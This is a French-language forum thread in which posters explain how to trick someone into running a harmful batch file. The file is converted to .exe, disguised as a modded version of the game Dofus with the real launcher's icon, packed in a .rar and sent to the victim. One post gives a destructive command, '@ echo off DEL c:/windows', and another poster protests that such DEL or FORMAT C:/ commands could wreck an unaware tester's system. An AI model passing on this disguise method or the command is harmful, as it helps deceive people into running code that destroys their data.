thomaspitre260
Membre
comment ?
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
comment ?
Tu cherche un convertisseur de bat en .exe , tu rename le batch que tu as convertis en .exe en par exemple " Dofus " pour qu'il clique dessus ( tu dit genre que c'est un dofus modded , essaie de trouver une excuse marrante) , puis tu met le dofus.exe ( le faux bien sur) dans un dossier que tu transforme en .rar , tu upload sur internet et tu l'envoie^^comment ?
Pour que ça aie lair plus vrai crée un raccourci du .bat et tu mets une icone en faisant Clic droit sur le raccourci > Raccourci > Changer d'icone et met celle de dofus en séléctionnant le vrai dofus launcherTu cherche un convertisseur de bat en .exe , tu rename le batch que tu as convertis en .exe en par exemple " Dofus " pour qu'il clique dessus ( tu dit genre que c'est un dofus modded , essaie de trouver une excuse marrante) , puis tu met le dofus.exe ( le faux bien sur) dans un dossier que tu transforme en .rar , tu upload sur internet et tu l'envoie^^
quand je le mais en .exe puis .rar quand on l'ouvre il y'a un message de sécuriter et safait quitter le fichierTu cherche un convertisseur de bat en .exe , tu rename le batch que tu as convertis en .exe en par exemple " Dofus " pour qu'il clique dessus ( tu dit genre que c'est un dofus modded , essaie de trouver une excuse marrante) , puis tu met le dofus.exe ( le faux bien sur) dans un dossier que tu transforme en .rar , tu upload sur internet et tu l'envoie^^
Bien joué ton premier mesage permet un up de + de 1 angenial
RIP Celui qui testHmm..
Code:@ echo off DEL c:/windows
Comme ça par exemple ? XDD
Ben celui qui fait ça, il pourra pas le dire toute suiteVous devriez prevenir de ne pas le faire de DEL ou FORMAT C:/ , ça se fait pas imaginez quelqu'un test et il connait pas![]()
Oui c'est sur que maintenant ya beaucoup mieux , même moi j'arrive a faire beaucoup plus puissant et beaucoup plus marrant , quand j'aurais le temps j'éditerais un peu ce vieux topic merciBof il y a mieux comme .bat !